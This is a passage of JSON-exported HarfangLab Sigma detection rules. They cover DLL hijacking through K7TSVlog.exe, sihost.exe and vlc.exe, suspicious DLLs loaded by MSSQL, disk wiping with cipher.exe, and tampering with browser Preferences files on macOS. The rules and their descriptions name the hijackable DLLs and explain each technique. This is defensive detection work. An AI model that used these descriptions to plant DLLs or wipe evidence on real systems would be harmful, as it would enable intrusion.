classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7TSVlog.exe'\n ImageLoaded|endswith: '\\K7UI.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40aa4aee-13e6-4b99-b9bd-b4dd753c0115",
"rule_name": "DLL Hijacking via K7TSVlog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7TSVlog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40ac8087-2675-4c61-985e-773fbdac1328",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076446Z",
"creation_date": "2026-03-23T11:45:34.076448Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076453Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sihost.yml",
"content": "title: DLL Hijacking via sihost.exe\nid: 40ac8087-2675-4c61-985e-773fbdac1328\ndescription: |\n Detects potential Windows DLL Hijacking via sihost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\coremessaging.dll'\n - '\\desktopshellext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40ac8087-2675-4c61-985e-773fbdac1328",
"rule_name": "DLL Hijacking via sihost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sihost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40c091bb-8190-4465-8e20-0f42a47d58b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084172Z",
"creation_date": "2026-03-23T11:45:34.084174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084179Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.netspi.com/blog/technical/adversary-simulation/attacking-sql-server-clr-assemblies/",
"https://www.tarlogic.com/blog/lateral-movement-mssql-clr-socket-reuse/",
"https://asec.ahnlab.com/en/51343/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1505/001/",
"https://learn.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server?view=sql-server-ver16"
],
"name": "t1190_mssql_suspicious_dll_loaded.yml",
"content": "title: Suspicious DLL Loaded by MSSQL\nid: 40c091bb-8190-4465-8e20-0f42a47d58b6\ndescription: |\n Detects the loading of a suspicious DLL by Microsoft SQL Server.\n Attackers able to execute arbitrary SQL commands in a Microsoft SQL Server are able to load CLR assemblies in the SQL server.\n One of the methods allowing attackers to load such assemblies imply that they write their malicious assemblies in a DLL on disk.\n This rule detects when a potentially malicious DLL is loaded by MSSQL.\n It is recommended to investigate the loaded DLL for malicious contents, and if necessary, quarantine it.\n It is also recommended to look for other malicious behavior on the host as well as potentially unauthorized authentications to the SQL server.\nreferences:\n - https://www.netspi.com/blog/technical/adversary-simulation/attacking-sql-server-clr-assemblies/\n - https://www.tarlogic.com/blog/lateral-movement-mssql-clr-socket-reuse/\n - https://asec.ahnlab.com/en/51343/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/001/\n - https://learn.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server?view=sql-server-ver16\ndate: 2023/09/04\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n Image|endswith: '\\sqlservr.exe'\n ImageLoaded|contains: '\\'\n\n filter_signed:\n Signed: 'true'\n\n filter_system32:\n ImageLoaded|re:\n - '(?i):\\\\Windows\\\\System32\\\\[^\\\\]*.dll'\n - '(?i):\\\\Windows\\\\Syswow64\\\\[^\\\\]*.dll'\n\n filter_location:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\assembly\\'\n - '?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - '?:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\'\n\n filter_mssql:\n - ImageLoaded:\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Shared\\instapi140.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\COM\\sqlvdi.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Binn\\ssnmpn70.dll'\n - '*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\SqlAccess.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkengine.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkruntime.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkcompile.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\DBGHELP.DLL'\n - ImageLoaded|startswith: '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Binn\\'\n Product: 'Microsoft SQL Server'\n\n exclusion_oracle:\n ImageLoaded|endswith:\n - '\\product\\\\*\\client_?\\bin\\ora*.dll'\n - '\\product\\\\*\\client_?\\ora*.dll'\n - '\\product\\\\*\\client_?\\bin\\oci.dll'\n - '\\product\\\\*\\client_?\\oci.dll'\n - '\\product\\\\*\\client_?\\oraociei11.dll'\n Company: 'Oracle Corporation'\n\n exclusion_sqlvdi:\n # C:\\Program Files\\Microsoft SQL Server\\80\\COM\\sqlvdi.dll\n ImageLoaded|endswith: '\\sqlvdi.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SQLVDI.DLL'\n\n exclusion_sqlevn:\n ImageLoaded|endswith: '\\MSSQL\\Binn\\Resources\\\\*\\sqlevn70.rll.mui'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SQLEVN70.DLL.MUI'\n\n exclusion_commvault:\n ImageLoaded|endswith: '\\Commvault\\ContentStore\\Base\\CvDBNativeAPI.dll'\n Company: 'Commvault'\n OriginalFileName: 'CvDBNativeAPI.dll'\n\n exclusion_stored_procedure:\n ImageLoaded|endswith: '\\DATA\\xtp\\\\*\\xtp_?_*_*_*_*.dll'\n Description: 'XTP Native DLL'\n\n exclusion_openedge:\n ImageLoaded|endswith: '\\OpenEdge\\bin\\\\*.dll'\n Company: 'DataDirect Technologies'\n\n exclusion_gip-cps:\n ImageLoaded: '?:\\Program Files\\GIP-CPS\\CPSRev.dll'\n Description: 'GIP-CPS Revocation Provider DLL'\n\n exclusion_hpe:\n ImageLoaded: '?:\\Program Files\\HPE\\StoreOnce\\isvsupport\\sql\\bin\\XP_HPStoreOnceForMSSQL.dll'\n\n exclusion_zeromq:\n ImageLoaded|endswith: '\\bin\\x64\\libzmq.dll'\n Description: 'ZeroMQ lightweight messaging kernel'\n\n exclusion_dotnet:\n ImageLoaded: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\sort????????.dll'\n Company: 'Microsoft Corporation'\n\n exclusion_ibm:\n ImageLoaded: '?:\\Program Files (x86)\\IBM\\Client Access\\Mri????\\cwb*.dll'\n\n exclusion_secureworks:\n ImageLoaded: '?:\\ProgramData\\SecureWorks\\TaegisAgent\\\\*\\TaegisInj.x64.dll'\n Company: 'SecureWorks Corp.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40c091bb-8190-4465-8e20-0f42a47d58b6",
"rule_name": "Suspicious DLL Loaded by MSSQL",
"rule_description": "Detects the loading of a suspicious DLL by Microsoft SQL Server.\nAttackers able to execute arbitrary SQL commands in a Microsoft SQL Server are able to load CLR assemblies in the SQL server.\nOne of the methods allowing attackers to load such assemblies imply that they write their malicious assemblies in a DLL on disk.\nThis rule detects when a potentially malicious DLL is loaded by MSSQL.\nIt is recommended to investigate the loaded DLL for malicious contents, and if necessary, quarantine it.\nIt is also recommended to look for other malicious behavior on the host as well as potentially unauthorized authentications to the SQL server.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-05-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40cf0043-cffd-4fc7-8fbf-6f5a0707feb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084636Z",
"creation_date": "2026-03-23T11:45:34.084638Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084643Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vlc.yml",
"content": "title: DLL Hijacking via vlc.exe\nid: 40cf0043-cffd-4fc7-8fbf-6f5a0707feb2\ndescription: |\n Detects potential Windows DLL Hijacking via vlc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vlc.exe'\n ProcessSignature: 'VideoLAN'\n ImageLoaded|endswith:\n - '\\libvlc.dll'\n - '\\axvlc.dll'\n\n filter_legitimate_image:\n Image:\n - '?:\\Program Files\\VideoLAN\\VLC\\\\*'\n - '?:\\Program Files (x86)\\VideoLAN\\VLC\\\\*'\n - '*\\VLCPortable\\App\\vlc\\\\*'\n\n filter_legitimate_imageloaded:\n ImageLoaded:\n - '?:\\Program Files\\VideoLAN\\VLC\\\\*'\n - '?:\\Program Files (x86)\\VideoLAN\\VLC\\\\*'\n - '*\\VLCPortable\\App\\vlc\\\\*'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VideoLAN'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40cf0043-cffd-4fc7-8fbf-6f5a0707feb2",
"rule_name": "DLL Hijacking via vlc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vlc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40e1474c-b643-46fe-8410-1397a2af4f88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088188Z",
"creation_date": "2026-03-23T11:45:34.088190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088195Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/",
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/certificates-and-public-key-infrastructure-pki/use-cipher-to-overwrite-deleted-data",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_data_wiper_cipher.yml",
"content": "title: Data Erased via cipher.exe\nid: 40e1474c-b643-46fe-8410-1397a2af4f88\ndescription: |\n Detects data erased using cipher.exe.\n Cipher.exe is a built-in Windows binary primary used to encrypt/decrypt data from NTFS drive that can also be used to overwrite deleted data of a disk.\n Adversaries may permanently delete files and artifacts left behind by the actions of their intrusion activity.\n It is recommended to check if the process removing data has legitimate reason to to so.\nreferences:\n - https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/certificates-and-public-key-infrastructure-pki/use-cipher-to-overwrite-deleted-data\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2024/11/26\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessImage|endswith: '\\cipher.exe'\n - OriginalFileName: 'CIPHER.EXE'\n\n exclusion_mindray:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Mindray\\eGateway\\CPAU.exe'\n - '?:\\Program Files\\Mindray\\eGateway\\CPAU.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40e1474c-b643-46fe-8410-1397a2af4f88",
"rule_name": "Data Erased via cipher.exe",
"rule_description": "Detects data erased using cipher.exe.\nCipher.exe is a built-in Windows binary primary used to encrypt/decrypt data from NTFS drive that can also be used to overwrite deleted data of a disk.\nAdversaries may permanently delete files and artifacts left behind by the actions of their intrusion activity.\nIt is recommended to check if the process removing data has legitimate reason to to so.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40e87c1e-7ced-4ba8-91fa-de32eb24ee6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617633Z",
"creation_date": "2026-03-23T11:45:34.617635Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617639Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_chrome_preferences_edited.yml",
"content": "title: Chrome-based Browser Preferences File Modified\nid: 40e87c1e-7ced-4ba8-91fa-de32eb24ee6d\ndescription: |\n Detects a suspicious modification to the Preferences file of Chrome and Chrome-based browsers (Edge, Brave, etc.).\n Adversaries may modify the browser's configuration in order to inject malicious ads during browsing.\n It is recommended to verify if the process performing the write operation has legitimate reasons to do so.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/12/11\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.ConfigChange\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'write'\n Path|startswith:\n - '/Users/*/Library/Application Support/Google/Chrome/'\n - '/Users/*/Library/Application Support/BraveSoftware/Brave-Browser/'\n - '/Users/*/Library/Application Support/Microsoft Edge/'\n - '/Users/*/Library/Application Support/com.operasoftware.Opera/'\n - '/Users/*/Library/Application Support/com.operasoftware.OperaGX/'\n - '/Users/*/Library/Application Support/Vivaldi/'\n Path|endswith:\n - '/Preferences'\n - '/Secure Preferences'\n ProcessImage|contains: '?'\n\n filter_chrome:\n Image:\n - '/Applications/Google Chrome*.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n filter_edge:\n Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox Media Plugin Helper'\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n exclusion_arc:\n Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n filter_brave:\n Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - '/Applications/Brave Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n filter_opera:\n Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n\n exclusion_tor_browser:\n Image:\n - '/*/Tor Browser*.app/Contents/MacOS/Tor/tor'\n - '/*/Tor Browser*.app/Contents/MacOS/firefox'\n - '/*/Tor Browser*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n\n exclusion_librewolf:\n Image:\n - '/*/LibreWolf*.app/Contents/MacOS/librewolf'\n - '/*/LibreWolf*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n\n exclusion_zen_browser:\n Image:\n - '/*/Zen Browser*.app/Contents/MacOS/zen'\n - '/*/Zen Browser*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '/*/Zen Browser*.app/Contents/MacOS/updater.app/Contents/MacOS/org.mozilla.updater'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40e87c1e-7ced-4ba8-91fa-de32eb24ee6d",
"rule_name": "Chrome-based Browser Preferences File Modified",
"rule_description": "Detects a suspicious modification to the Preferences file of Chrome and Chrome-based browsers (Edge, Brave, etc.).\nAdversaries may modify the browser's configuration in order to inject malicious ads during browsing.\nIt is recommended to verify if the process performing the write operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-12-11",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40eea7ed-b9cd-4cae-94cb-3ed700cef311",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090571Z",
"creation_date": "2026-03-23T11:45:34.090573Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090577Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_radmin_named_pipe_connection.yml",
